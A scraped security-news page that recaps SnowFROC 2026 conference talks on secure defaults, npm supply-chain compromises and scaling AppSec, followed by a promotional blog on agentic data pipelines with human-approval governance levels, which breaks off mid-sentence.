href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Frandall-munroes-xkcd-planets-and-bright-stars-2%2F&amp;linkname=Randall%20Munroe%E2%80%99s%20XKCD%20%E2%80%98Planets%20and%20Bright%20Stars%E2%80%99" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Frandall-munroes-xkcd-planets-and-bright-stars-2%2F&amp;linkname=Randall%20Munroe%E2%80%99s%20XKCD%20%E2%80%98Planets%20and%20Bright%20Stars%E2%80%99" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.infosecurity.us/">Infosecurity.US</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Marc Handelman">Marc Handelman</a>. Read the original post at: <a href="https://xkcd.com/3219/">https://xkcd.com/3219/</a> </p>

<p>The post <a href="https://blog.gitguardian.com/snowfroc-2026/">SnowFROC 2026: Secure Defaults, Real Trust, and a Better Layer on Top</a> appeared first on <a href="https://blog.gitguardian.com/">GitGuardian Blog – Take Control of Your Secrets Security</a>.</p><p><img decoding="async" src="https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/2026/04/SnowFROCimage.png" alt="SnowFROC 2026: Secure Defaults, Real Trust, and a Better Layer on Top"></p><p>Denver likes a good origin story. The city still keeps a marker for <a href="https://visitdenver.com/blog/post/cheeseburger-birthplace/?ref=blog.gitguardian.com"><u>Louis Ballast and the Humpty Dumpty Barrel, the local spot tied to the cheeseburger’s Colorado claim</u></a>. That detail felt oddly right for <a href="https://snowfroc.com/?ref=blog.gitguardian.com"><u>SnowFROC 2026</u></a>. A cheeseburger is a small upgrade that changes the whole meal. This year’s conference kept returning to the same ideas in AppSec, such as how meaningful security progress often comes from well-placed layers that make the better choice easier to make. </p><p>The Snow in "SnowFROC" is due to the time of year the event takes place and the good possibility that it will snow, <a href="https://bsky.app/profile/mdwayne-real.bsky.social/post/3mjplq47s4m2x?ref=blog.gitguardian.com"><u>which it did this year</u></a>.  The other half of the name stands for Front Range OWASP Conference. This year, they expanded it into a two-day event in Denver that drew about 400 attendees to see 35 sessions, take part in 8 half-day training sessions, a CTF, and multiple village activities. The room carried that blend of practical curiosity and sharp hallway conversation that makes any security conference worth the trip. </p><p>Throughout the event, the sessions covered how software is actually built now: fast, AI-assisted, dependency-heavy, and spread across more people and systems than any one security team can fully monitor alone. The strongest sessions focused on incentives, workflows, trust boundaries, and the places where attackers keep finding leverage because defenders still leave too much to intent, memory, and good luck.</p><p>Here are just a few notes from SnorFROC 2026.</p><h2 id="the-human-layer-in-secure-defaults"><strong>The Human Layer in Secure Defaults</strong></h2><p>In the keynote from<a href="https://ca.linkedin.com/in/tanya-janca?ref=blog.gitguardian.com"><u> Tanya Janca, founder of She Hacks Purple Consulting</u></a>, called "Threat Modeling Developer Behavior: The Psychology of Bad Code," she explained that in AppSec, insecure code is rarely just a technical failure. It is usually a human one. Developers work under pressure, chase deadlines, respond to incentives, and fall back on habits, biases, and shortcuts that feel reasonable in the moment. Instead of telling people they are wrong and expecting better outcomes, AppSec teams need to understand why those choices happen in the first place. Psychology helps explain the gap between what teams say they value and what their systems actually reward.</p><p>Tanya talked about intervention and prevention over blame. Secure defaults beat secure intent because they remove friction and make the safer path the easier one. That can look like pre-commit hooks, IDE nudges, secure-by-default templates, and frequent reminders placed where decisions actually happen, not buried in a wiki. The same logic applies to training. Annual compliance sessions and lists of what not to do do not change behavior very well. Teaching secure patterns, explaining the why behind them, and reinforcing them in small daily ways is far more likely to stick. The goal is not more nagging. It is better environmental design.</p><p>Tayna shared her experiences about AI-assisted coding triggering automation bias, where people trust confident suggestions too quickly. Tight deadlines push present bias, making future breach risk feel abstract next to immediate shipping pressure. Copying code from forums, skipping tests, ignoring warnings, avoiding documentation, or showing off with clever code all follow similar patterns. </p><p>She asked us all to build systems that reward maintainable, tested, secure work and measure what actually matters, including time to fix, adoption of secure patterns, and real vulnerability reduction. If teams want secure coding to be real, they have to make it the path of least resistance.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img decoding="async" src="https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/2026/04/data-src-image-9b8dc1df-9ed9-4d7b-8e9d-fa969e3d8d20.png" class="kg-image" alt="SnowFROC 2026: Secure Defaults, Real Trust, and a Better Layer on Top" loading="lazy" width="1000" height="753" srcset="https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/size/w600/2026/04/data-src-image-9b8dc1df-9ed9-4d7b-8e9d-fa969e3d8d20.png 600w, https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/2026/04/data-src-image-9b8dc1df-9ed9-4d7b-8e9d-fa969e3d8d20.png 1000w" sizes="auto, (min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Tanya Janca</span></figcaption></figure><h2 id="trust-has-become-a-supply-chain-primitive"><strong>Trust Has Become a Supply Chain Primitive</strong></h2><p><a href="https://www.linkedin.com/in/chris-lindsey-39b3915?ref=blog.gitguardian.com"><u>Chris Lindsey, Field CTO at OX Security</u></a>, started his talk "Inside the Modern Threat Landscape: Attacker Wins, Defender Moves, and Your Priorities," with a reminder that choosing not to act is still a choice. In today’s threat landscape, a small set of attack vectors keeps showing up in outsized breaches, including credential theft, session hijacking, phishing, typosquatting, browser extensions, DNS poisoning, and software that appears to come from trusted sources. The common thread is trust. Attackers do not usually break in by brute force alone, instead they build credibility first through a convincing email or a familiar package name, or a browser extension that looks legitimate on the surface. </p><p>Chris asked us to think in terms of what security leaders are asked by boards all the time and often struggle to answer: what did we actually get for this investment? What we need more disciplined framework for evaluating security spending based on risk reduction per dollar. That means asking better questions up front: what threat does this control address, what does it really cost once licensing, implementation, staffing, and maintenance are included, and what measurable reduction in exposure does it create? This is how you get to structured decision-making. When security teams can explain why one control was prioritized over another in terms that leadership understands, the conversation changes from vague reassurance to defensible tradeoffs.</p><p>If software and packages are still being pulled in freely, if extensions get broad permissions without scrutiny, and if reviews stop at surface-level validation, the pipeline stays open to abuse. Chris walked through examples that looked benign at first glance but revealed patterns of Trojan behavior, suspicious permissions, deceptive imports, callback infrastructure, and signs of rushed or obfuscated code. Prioritization is key. </p><p>He gave us the practical advice of what we could immediately implement: Scan software before use, review open source with stronger technical oversight, pin safe packages, and introduce cooldown periods. We must adopt a posture in which we rotate keys aggressively, sever malicious command-and-control connections urgently, and embrace AI to scale analysis where it adds real value. Attackers are operating in the real world and have no intention of reading your threat model. Your defenses need to be just as practical and reality-based.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img decoding="async" src="https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/2026/04/data-src-image-8f9ce2b3-f9b8-4cbd-a00b-c76b372e776b.png" class="kg-image" alt="SnowFROC 2026: Secure Defaults, Real Trust, and a Better Layer on Top" loading="lazy" width="1000" height="753" srcset="https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/size/w600/2026/04/data-src-image-8f9ce2b3-f9b8-4cbd-a00b-c76b372e776b.png 600w, https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/2026/04/data-src-image-8f9ce2b3-f9b8-4cbd-a00b-c76b372e776b.png 1000w" sizes="auto, (min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Chris Lindsey</span></figcaption></figure><h2 id="npm%E2%80%99s-crisis-is-really-an-operations-story"><strong>npm’s Crisis Is Really an Operations Story</strong></h2><p>In the session from<a href="https://www.linkedin.com/in/jenngile?ref=blog.gitguardian.com"><u> Jenn Gile, founder of OpenSourceMalware.com</u></a>, called "npm's dark side: Preventing the next Shai-Hulud," she presented the last year of npm account takeovers and package compromises as a lesson in how malware now rides normal engineering behavior. Jenn drew a sharp line between two kinds of software risk: accidental vulnerabilities and intentionally malicious packages. A vulnerability is a flaw that can be exploited if an attacker has a viable path. Malicious software is built from the start to cause harm, often by targeting developers and build environments directly, and it does not always need the same kind of runtime path to do damage. Malicious code does rely, though, on abusing trust. When trust is the vector, the usual instinct to stay on the latest version can become part of the problem.</p><p>The heart of the session was account takeover (ATO) and why npm remains such an attractive target. Install scripts still run by default, and provenance is not mandatory. Long-lived publishing tokens remain common. In practice, that means attackers do not always need to break the package ecosystem itself. They can hijack trust that already exists. Jenn walked through a string of compromises from 2025 into 2026, including phishing campaigns, typosquatted domains, spoofed maintainer emails, CI and GitHub Actions token theft, and follow-on attacks that used stolen secrets to widen the blast radius. The throughline across cases like Nx, Qix, <a href="https://blog.gitguardian.com/shai-hulud-2/"><u>Shai-Hulud</u></a>, <a href="https://blog.gitguardian.com/team-pcp-snowball-analysis/"><u>TeamPCP</u></a>, and Axios was not just a technical weakness. It was how easily trusted maintainers, trusted packages, and trusted upgrade habits could be turned against the people relying on them.</p><p>Jenn explained that hardware keys help protect the human authentication path, while trusted publishing helps protect the machine path by tying publication to a specific GitHub Actions identity. Session-based authentication can reduce exposure windows, even if it does not eliminate the risk of phishing. However, strong controls only work if teams actually use them, and right now, friction and bias still get in the way.</p><p>Jenn's advice was to treat malware prevention as a team sport across development, product security, cloud security, and incident response. Use lockfiles, avoid automatic upgrades, scrutinize lifecycle scripts, harden CI, scan for malware earlier, rotate and scope credentials, monitor for misuse, and build supply chain playbooks that account for how malware behaves differently from ordinary vulnerabilities, especially in the JavaScript and Python ecosystems.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img decoding="async" src="https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/2026/04/data-src-image-9a5b7271-e518-415c-a8fe-141df547adab.png" class="kg-image" alt="SnowFROC 2026: Secure Defaults, Real Trust, and a Better Layer on Top" loading="lazy" width="1000" height="753" srcset="https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/size/w600/2026/04/data-src-image-9a5b7271-e518-415c-a8fe-141df547adab.png 600w, https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/2026/04/data-src-image-9a5b7271-e518-415c-a8fe-141df547adab.png 1000w" sizes="auto, (min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Jenn Gile</span></figcaption></figure><h2 id="scale-comes-from-systems-not-heroics"><strong>Scale Comes From Systems, Not Heroics</strong></h2><p>In the final talk of the day, from <a href="https://www.linkedin.com/in/mudita-khurana-87b72442/?ref=blog.gitguardian.com"><u>Mudita Khurana, an Airbnb staff security engineer</u></a>, called "Scaling AppSec through humans &amp; agents," they presented a model for handling a world where code volume is rising fast, AI tools are now common, and meaningful portions of code are being produced outside the old IDE-centered workflow. She explained her company is seeing more code, more contributors, and far more code generated with AI than even a few years ago. Today nearly all pull request authors are using AI coding tools weekly, a meaningful amount of code is now written by non-engineers outside the IDE, and a large share of total code is AI-generated. Mudita explained you cannot keep up by adding manual review alone. Their response is a layered one: unified tooling to create consistency, LLM agents to extend coverage, and a human network to bring judgment and context where automation still falls short.</p><p>A single security CLI acts as the abstraction layer over capabilities like static analysis, software composition analysis, secrets detection, and infrastructure-as-code scanning, with the same experience, exemptions, and metrics no matter where it runs. That lets security checks show up across the developer workflow, from lightweight pre-commit feedback to fuller pull request scans and post-merge coverage. </p><p>On top of that, the team is using AI for security review in a more grounded way than generic prompting. Instead of asking a model for a broad security pass, they feed it security requirements as code, along with internal frameworks, auth models, and known anti-patterns. They also measure prompt changes against a dataset built from real historical vulnerabilities, which gives them a baseline for whether the agents are actually improving.</p><p>The part of their plan that Mudita was the most excited to share was their security champions program. They do not treat this program as volunteer side work. It is tied to the engineering career ladder, backed by real responsibilities, and supported with a two-way flow of data between security and the orgs doing the work. These champions help write custom rules, triage findings, support risk assessments, and drive adoption because they understand the business context in a way central security teams often cannot. They have created a feedback loop where human insight improves the tools, the tools improve the signal, and prevention gradually moves earlier, into the IDE, into AI prompts, and into the default way code gets written.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img decoding="async" src="https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/2026/04/data-src-image-6417a808-7d7c-4078-abe8-5bafd5d0ab0b.png" class="kg-image" alt="SnowFROC 2026: Secure Defaults, Real Trust, and a Better Layer on Top" loading="lazy" width="1000" height="753" srcset="https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/size/w600/2026/04/data-src-image-6417a808-7d7c-4078-abe8-5bafd5d0ab0b.png 600w, https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/2026/04/data-src-image-6417a808-7d7c-4078-abe8-5bafd5d0ab0b.png 1000w" sizes="auto, (min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Mudita Khurana</span></figcaption></figure><h2 id="security-that-lives-where-decisions-happen">Security that lives where decisions happen</h2><p>One pattern ran through almost every strong session: security works best when it shows up at the point of action. In an IDE. In a pull request. In a package policy. In a browser extension review. In a token issuance flow. In a prompt used by an AI assistant. Teams still lose time when secure guidance lives in a wiki, a yearly training deck, or a control that runs too late to influence the original choice.</p><p>That shift sounds simple, but it changes program design. It favors lightweight friction, contextual signals, paved paths, and small reminders over large annual campaigns. It also favors security teams that can collaborate with developer platforms, identity teams, and cloud teams instead of operating as a separate review function.</p><h3 id="the-new-perimeter-is-made-of-borrowed-trust"><strong>The new perimeter is made of borrowed trust</strong></h3><p>Modern software development depends on borrowed trust. Developers trust registries, packages, maintainers, AI suggestions, browser tools, and automation pipelines. Organizations trust tokens, runners, integrations, and service accounts to behave within expected bounds. Attackers know that every one of those relationships can be bent.</p><p>That has direct implications for secrets management and non-human identities. A stolen token, an over-scoped credential, or a poisoned dependency can move through trusted systems much faster than traditional controls were built to handle. The answer is tighter provenance, shorter credential lifetimes, stronger attestation, clearer ownership, and continuous review of the trust assumptions hiding inside delivery pipelines.</p><h3 id="maturity-now-means-feedback-loops"><strong>Maturity now means feedback loops</strong></h3><p>There was another persistent theme that we need to focus on creating feedback loops. Behavioral nudges need measurement to know how to improve them. Threat prioritization needs cost and impact models to claim success. AI review needs evaluation against real defects to be meaningful. Supply chain response needs intelligence, containment, and recovery steps that teams can actually execute.</p><p>Mature AppSec programs increasingly look like systems that learn. They collect signals, improve defaults, refine detections, tighten identity boundaries, and push lessons back into the places where code and infrastructure are created. The organizations that do this well will handle AI-generated code, secrets sprawl, and NHI governance with more control because they have already built the habit of turning incidents and friction into better operating models.</p><h2 id="mile-high-city-learnings"><strong>Mile High City Learnings</strong></h2><p>SnowFROC 2026, which happens at the highest altitupd of any OWASP event, felt grounded in the best way. Talks treated security as daily operating design that focused on how people are rewarded, how trust is granted, how credentials spread, and how teams scale judgment without burning out the humans in the loop. Your author was able to give a talk about how we moved from slow waterfall based deployment to a world of DevOps where we have never deployed more, faster. We have a golden opportunity as we adopt AI across our tool chains to rethink authentication in a meaningful way that might just reverberate through all our stacks of non-human identities. That is the feedback look we can all benefit from.  </p><p>For teams thinking about identity risk, secrets exposure, and the governance of machine-driven development, SnowFROC offered a useful path forward. Start with defaults. Reduce silent trust. Treat credentials and dependencies as live operational risk. Then build feedback loops that make the next secure decision easier than the last one. That is a practical agenda, and after a snowy spring day in Denver, it also feels achievable.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/04/snowfroc-2026-secure-defaults-real-trust-and-a-better-layer-on-top/" data-a2a-title="SnowFROC 2026: Secure Defaults, Real Trust, and a Better Layer on Top"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fsnowfroc-2026-secure-defaults-real-trust-and-a-better-layer-on-top%2F&amp;linkname=SnowFROC%202026%3A%20Secure%20Defaults%2C%20Real%20Trust%2C%20and%20a%20Better%20Layer%20on%20Top" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fsnowfroc-2026-secure-defaults-real-trust-and-a-better-layer-on-top%2F&amp;linkname=SnowFROC%202026%3A%20Secure%20Defaults%2C%20Real%20Trust%2C%20and%20a%20Better%20Layer%20on%20Top" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fsnowfroc-2026-secure-defaults-real-trust-and-a-better-layer-on-top%2F&amp;linkname=SnowFROC%202026%3A%20Secure%20Defaults%2C%20Real%20Trust%2C%20and%20a%20Better%20Layer%20on%20Top" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fsnowfroc-2026-secure-defaults-real-trust-and-a-better-layer-on-top%2F&amp;linkname=SnowFROC%202026%3A%20Secure%20Defaults%2C%20Real%20Trust%2C%20and%20a%20Better%20Layer%20on%20Top" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fsnowfroc-2026-secure-defaults-real-trust-and-a-better-layer-on-top%2F&amp;linkname=SnowFROC%202026%3A%20Secure%20Defaults%2C%20Real%20Trust%2C%20and%20a%20Better%20Layer%20on%20Top" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://blog.gitguardian.com/">GitGuardian Blog - Take Control of Your Secrets Security</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Dwayne McDaniel">Dwayne McDaniel</a>. Read the original post at: <a href="https://blog.gitguardian.com/snowfroc-2026/">https://blog.gitguardian.com/snowfroc-2026/</a> </p>

<p>Data engineering is no longer about building pipelines that follow instructions. It is about building systems that think, adapt, and fix themselves. The traditional model of static workflows, manual monitoring, and reactive debugging is breaking under the pressure of modern data scale and speed.</p><p><a href="https://www.ishir.com/blog/320339/ai-native-marketing-is-here-its-not-the-next-destination.htm">Agentic data pipelines</a> change that completely. They replace rigid processes with autonomous systems powered by AI agents that can observe, reason, act, and learn in real time. Instead of waiting for engineers to intervene, these pipelines make decisions on their own, handle failures as they happen, and continuously improve from experience.</p><p>This shift is not theoretical. It is already redefining how data platforms are built and operated in 2026. In this blog, we break down how agentic pipelines work, what makes them different, and how teams can start adopting them without unnecessary risk.</p><h2>What Are Agentic Data Pipelines?</h2><p>Traditional data pipelines follow fixed instructions. <a href="https://www.ishir.com/blog/319236/how-to-prepare-your-business-for-ai-a-workflow-first-approach.htm">Engineers define workflows</a>, schedule jobs, and fix failures manually. Agentic pipelines remove that rigidity. They are AI-driven systems that can reason, plan, act, and learn without constant human input. In 2026, this is no longer experimental. Most new data infrastructure is being created and managed by <a href="https://www.ishir.com/artificial-intelligence.htm">AI agents</a>, not humans.</p><h2>The Six Layers of an Agentic Pipeline: How Intelligence Is Built Into Data Systems</h2><p><strong>1. Intent Layer</strong><br> The intent layer defines the purpose of the pipeline instead of just the steps. It captures business goals, data consumers, and expectations around freshness, accuracy, and reliability. This allows the system to prioritize decisions dynamically based on outcomes, not instructions. Without intent, the pipeline cannot adapt and simply executes blindly.</p><p><strong>2. Observability Layer</strong><br> The observability layer provides continuous visibility into pipeline health, <a href="https://www.ishir.com/blog/126517/why-investing-in-quality-analysts-is-investing-in-your-future.htm">data quality</a>, and system performance. It tracks metrics like failures, schema drift, anomalies, and SLA breaches in real time. These signals act as the foundation for decision-making. Without strong observability, the system lacks awareness and cannot respond effectively.</p><p><strong>3. Reasoning Engine</strong><br> The reasoning engine is the decision-making core that interprets signals and determines the right course of action. It performs root cause analysis, evaluates possible fixes, and selects the best response based on context. This eliminates generic reactions and replaces them with intelligent, situation-aware decisions. It is what makes the pipeline autonomous instead of reactive.</p><p><strong>4. Action Layer</strong><br> The action layer executes decisions directly within the system by interacting with orchestration tools and infrastructure. It can restart jobs, scale resources, modify queries, or isolate faulty data. This layer ensures that decisions are not just theoretical but actually implemented in production. Speed and reliability of execution define its effectiveness.</p><p><strong>5. Memory Layer</strong><br> The memory layer stores past incidents, decisions, and outcomes to improve future responses. It allows the system to learn from recurring issues and resolve them faster over time. Instead of re-analyzing every problem, the pipeline builds operational intelligence. This continuous learning is what drives long-term efficiency and resilience.</p><p><strong>6. Governance Layer</strong><br> The governance layer enforces policies, controls, and compliance boundaries for all actions. It defines what can be automated, what requires approval, and ensures every decision is logged and traceable. This layer builds trust by balancing autonomy with control. Without governance, the system risks making unchecked changes in production.</p><h2>AI-Driven Pipeline Automation Loop: From Detection to Self-Healing</h2><p>Agentic pipelines operate on a continuous loop that enables real-time decision-making and self-healing without human intervention. Each step in the loop plays a distinct role in maintaining and improving the system.</p><ul> <li><strong>Observe</strong><br> Continuously monitors system signals, including logs, metrics, data quality, schema changes, and performance indicators. This step ensures the pipeline has full visibility into both data and infrastructure conditions in real time.</li> <li><strong>Reason</strong><br> Analyzes the observed signals to identify root causes of issues. It differentiates between transient errors and deeper systemic problems, then determines the most effective course of action based on context and intent.</li> <li><strong>Act</strong><br> Executes the chosen response directly within the system. This could involve retrying jobs, scaling resources, modifying queries, or isolating problematic data to prevent downstream impact.</li> <li><strong>Remember</strong><br> Stores the incident, decision, and outcome as part of the system’s memory. This enables faster and more accurate handling of similar issues in the future, improving performance over time.</li> </ul><h2>AI-Powered Self-Healing Pipelines for Data Reliability</h2><p>Self-healing is the immediate payoff. Engineers currently spend a large portion of time identifying and fixing issues. Agentic systems eliminate most of that effort.</p><p><strong>Failure scenarios and autonomous responses</strong></p><p><img fetchpriority="high" decoding="async" class="alignnone size-full wp-image-320924" src="https://www.ishir.com/wp-content/uploads/2026/04/AI-First-Products-4.png" alt="" width="740" height="432" srcset="https://www.ishir.com/wp-content/uploads/2026/04/AI-First-Products-4.png 740w, https://www.ishir.com/wp-content/uploads/2026/04/AI-First-Products-4-300x175.png 300w" sizes="(max-width: 709px) 85vw, (max-width: 909px) 67vw, (max-width: 984px) 61vw, (max-width: 1362px) 45vw, 600px"></p><h2>Autonomous Data Pipeline Generation: AI-Driven Pipeline Creation from Intent</h2><h4><strong>Autonomous Pipeline Generation</strong></h4><p>Beyond self-healing, agentic systems can generate entire pipeline components from natural language specifications or by analyzing raw data patterns. Tools like Databricks Genie Code (launched March 2026) and Snowflake Cortex Code represent the leading edge of this capability.</p><p>Genie Code reasons through problems, plans multi-step approaches, writes and validates production-grade code, and maintains the result — all while keeping humans in control of the decisions that matter. On real-world data science tasks, it more than doubled the success rate of leading coding agents from 32.1% to 77.1%.</p><p><strong>E<u>xample: Agent-generated dbt model</u></strong></p><p><a href="https://www.ishir.com/data-ai-acceleration.htm">Data transformation agents</a> can analyze raw data patterns, suggest and generate dbt models and tests automatically, aligned with organizational best practices. Here is what agent-assisted pipeline generation looks like:</p><p><img decoding="async" class="alignnone size-full wp-image-320929" src="https://www.ishir.com/wp-content/uploads/2026/04/AI-First-Products-5.png" alt="AI-First Products " width="740" height="432" srcset="https://www.ishir.com/wp-content/uploads/2026/04/AI-First-Products-5.png 740w, https://www.ishir.com/wp-content/uploads/2026/04/AI-First-Products-5-300x175.png 300w" sizes="(max-width: 709px) 85vw, (max-width: 909px) 67vw, (max-width: 984px) 61vw, (max-width: 1362px) 45vw, 600px"></p><h2>Multi-Agent Data Pipeline Orchestration: Coordinating AI Agents for Scalable, Autonomous Data Engineering</h2><p>Modern agentic pipelines do not rely on a single AI agent. They operate as coordinated systems of specialized agents, each responsible for a specific function within the data lifecycle. This approach mirrors how high-performing data teams work, but executes at machine speed with continuous coordination and no handoffs.</p><p>At the center is the <a href="https://www.ishir.com/ai-agent-orchestration-services.htm">orchestrator agent</a>, which acts as the control layer. It assigns tasks, manages dependencies, resolves conflicts between agents, and maintains a global view of pipeline health. It ensures that all components work in sync and that decisions align with the pipeline’s intent and governance policies.</p><p><strong>Supporting it are domain-specific agents:</strong></p><ul> <li><strong>Ingestion Agents</strong> handle data intake from multiple sources. They monitor schema changes, adjust parsing logic dynamically, and ensure incoming data remains compatible with downstream systems. This reduces breakages caused by upstream changes.</li> <li><strong>Data Quality Agents</strong> continuously validate data against defined standards. They detect anomalies, enforce data contracts, quarantine bad records, and trigger corrective actions when quality thresholds are violated. This prevents bad data from propagating across the pipeline.</li> <li><strong>Transformation Agents</strong> generate, optimize, and maintain transformation logic. They build <a href="https://www.ishir.com/hire-mysql-developer.htm">SQL queries</a>, dbt models, and feature engineering workflows while continuously improving performance and efficiency based on usage patterns.</li> </ul><p>The real complexity lies in coordination. These agents often operate on overlapping responsibilities and shared resources. The orchestration layer must manage dependencies, prioritize tasks, and resolve conflicts in real time. For example, a quality agent may flag an issue while a transformation agent is mid-execution. The orchestrator decides whether to pause, reroute, or continue processing based on impact and policy.</p><p>This multi-agent architecture enables parallel execution, faster recovery, and higher system resilience. Instead of a single point of failure, intelligence is distributed across multiple agents that collaborate continuously. The result is a data pipeline that is not just automated, but coordinated, adaptive, and scalable by design.</p><h2>Governance, Trust &amp; the Human-in-the-Loop</h2><p>The most common objection to agentic pipelines is: how do you trust a system that modifies <a href="https://www.ishir.com/blog/42058/top-15-emerging-databases-to-use-in-2022-and-beyond.htm">production databases</a> without asking permission? The answer is Policy-Based Action Frameworks – a governance layer that defines exactly what agents can and cannot do autonomously.</p><p><strong>Policy enforcement levels:</strong></p><ul> <li>Notify only – agent identifies issue, logs it, and alerts a human. No autonomous action taken.</li> <li>Suggest – agent proposes a specific remediation with reasoning. Human reviews and approves before execution.</li> <li>Auto-approve low-risk – agent autonomously executes pre-approved actions (retries, minor schema fixes). Logs all actions.</li> <li>Full autonomy with audit – agent acts freely within defined policy boundaries. Every action logged with reasoning traces.</li> </ul><p>Most organizations start at ‘notify only’ and progressively unlock higher autonomy as trust in the system is established. This graduated approach is critical – it allows teams to validate the agent’s logic in shadow mode before granting write access to production systems.</p><p>As agentic operating models mature, <a href="https://www.ishir.com/hire-big-data-engineer.htm">data engineers</a> shift from hand-coding transformations to supervising autonomous systems. That means designing guardrails, reviewing agent decisions, and resolving novel edge cases. Explainability becomes core to the model: reasoning traces, auditable logs, and human-in-the-loop checkpoints are required for trust and compliance.</p><h2>AI-Powered Data Engineering Tools, Roles, and Impact</h2><h4><strong>Agentic Data Platforms</strong></h4><p><strong>Tools included:</strong> Databricks Genie Code, Snowflake Cortex Code<br> These platforms handle end-to-end pipeline generation, optimization, and deployment. They translate business intent into production-ready workflows using AI. The impact is faster development cycles, reduced manual coding, and higher consistency in pipeline design.</p><h4><strong>Pipeline Orchestration Tools</strong></h4><p><strong>Tools included:</strong> Apache Airflow, Dagster, Prefect<br> These tools manage scheduling, dependencies, and execution of <a href="https://www.ishir.com/blog/313910/ai-agent-orchestration-how-it-works-and-why-it-matters.htm">data workflows</a>. In agentic systems, they act as execution backbones where AI agents trigger reruns, adjust workflows, and optimize operations in real time. Their role is critical for stability and controlled execution.</p><h4><strong>Self-Healing and Observability Tools</strong></h4><p><strong>Tools included:</strong> Acceldata ADM, Monte Carlo, OpenTelemetry<br> These tools provide deep visibility into pipeline health, data quality, and system performance. They enable anomaly detection and support automated remediation through <a href="https://www.ishir.com/ai-agent-development-services.htm">agentic decision-making</a>. The impact is reduced downtime and elimination of manual debugging.</p><h4><strong>Data Transformation and AI Modeling Tools</strong></h4><p><strong>Tools included:</strong> dbt with AI agents, Spark with LLMs<br> These tools automate the creation and optimization of data transformations. They generate <a href="https://www.ishir.com/blog/317646/migrating-sql-server-to-aurora-postgresql-solving-the-real-challenges-of-cloud-database-modernization.htm">SQL models</a>, enforce <a href="https://www.ishir.com/software-testing-qa-services.htm">data tests</a>, and improve performance based on usage patterns. This reduces engineering effort while improving data reliability and scalability.</p><h4><strong>Data Governance and Lineage Tools</strong></h4><p><strong>Tools included</strong>: Unity Catalog, Apache Atlas, OpenLineage<br> These systems enforce access controls, maintain lineage, and ensure compliance. They define what actions agents can take and provide full auditability of every decision. Their impact is trust, transparency, and safe automation in production environments.</p><h4><strong>Memory and Context Stores</strong></h4><p><strong>Tools included:</strong> LanceDB, Chroma, Vector databases<br> These systems store historical context, past incidents, and decision outcomes. They allow AI agents to learn from previous scenarios and improve over time. The result is faster resolution of recurring issues and continuous system optimization.</p><h2>Agentic Data Pipeline Implementation Roadmap</h2><h4><strong>Step 1: Start with AI-Assisted Pipeline Development</strong></h4><p>Adopt AI coding tools like GitHub Copilot, Databricks Genie Code, or Snowflake Cortex Code to accelerate pipeline creation. This delivers immediate productivity gains without changing existing architecture. It is the lowest-risk entry point into agentic systems.</p><h4><strong>Step 2: Implement Automated Data Quality Monitoring</strong></h4><p><a href="https://www.ishir.com/hire-machine-learning-engineers.htm">Deploy ML-based data quality</a> and anomaly detection tools to replace static rules. This improves accuracy in detecting issues and significantly reduces alert fatigue. It builds the foundation for intelligent decision-making.</p><h4><strong>Step 3: Deploy Self-Healing Agents in Shadow Mode</strong></h4><p>Introduce agentic systems in “suggest only” mode where they recommend fixes but do not execute them. Monitor their decisions over a few weeks to validate accuracy and build trust. This step ensures safe 